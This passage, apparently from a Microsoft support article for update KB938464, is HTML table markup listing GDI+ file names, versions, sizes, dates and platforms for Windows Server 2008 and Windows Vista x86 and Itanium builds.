name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6000.20826_none_771e72777c21140e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:38</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.18065_none_8dcc2d1362c70bc9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">11:31</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.22170_none_76fff8857c6d0501.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 and Windows Vista, Itanium-based versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.18065</td><td class=\"sbody-td\">4,906,496</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">06:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.22170</td><td class=\"sbody-td\">4,906,496</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.18065</td><td class=\"sbody-td\">5,260,800</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">06:38</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.22170</td><td class=\"sbody-td\">5,260,800</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.18065</td><td class=\"sbody-td\">1,748,992</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.22170</td><td class=\"sbody-td\">1,748,992</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.18065</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.22170</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:22</td><td class=\"sbody-td\">x86</td></tr></table></div><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_0b363687151303c5b51edc527e5d566a_6595b64144ccf1df_1.0.6001.22170_none_2d73da9b9148508f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">629</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_30ab59cf4af7b53009844141400e3874_6595b64144ccf1df_1.0.6001.22170_none_7709b48c1d8654e8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">920</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_41c135bbe2fd69ee873a31c8eb6f7fe2_6595b64144ccf1df_1.1.6001.22170_none_82481ae944d45a24.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">920</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_9a335abb9862c42bf13dfb9c171621f4_6595b64144ccf1df_1.0.6001.18065_none_d0d64d80f7bc49f5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">629</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_a02a0c35f24c31998bff4ccf02fa5e69_6595b64144ccf1df_1.1.6001.22170_none_b355f8c654d30298.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">629</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_adc47c2d184a114a48225b0b0aad9c2a_6595b64144ccf1df_1.0.6001.18065_none_760f9b9a01af9f5a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">920</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_c1bf236177f6d9cd74563b4fd61eda73_6595b64144ccf1df_1.1.6001.18065_none_102db2ce6ec0fd2e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">920</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_d915363da8554d2d44e29124e2f5a90c_6595b64144ccf1df_1.1.6001.18065_none_0f6cf6c96443bca2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">629</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.18065_none_9e7a9bf0c9c16a06.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,169</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.22170_none_87ae6762e367633e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,169</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:12</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.18065_none_8dcc0ad562c743ad.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,169</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">09:05</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.22170_none_76ffd6477c6d3ce5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,169</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:20</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb938464_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,245</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb938464~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,508</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb938464_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,568</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb938464~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,173</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb938464_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,568</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb938464~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,177</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,415</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_0~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,435</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,417</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,436</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,419</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_0~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_bf~31bf3856ad364e35~ia64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td 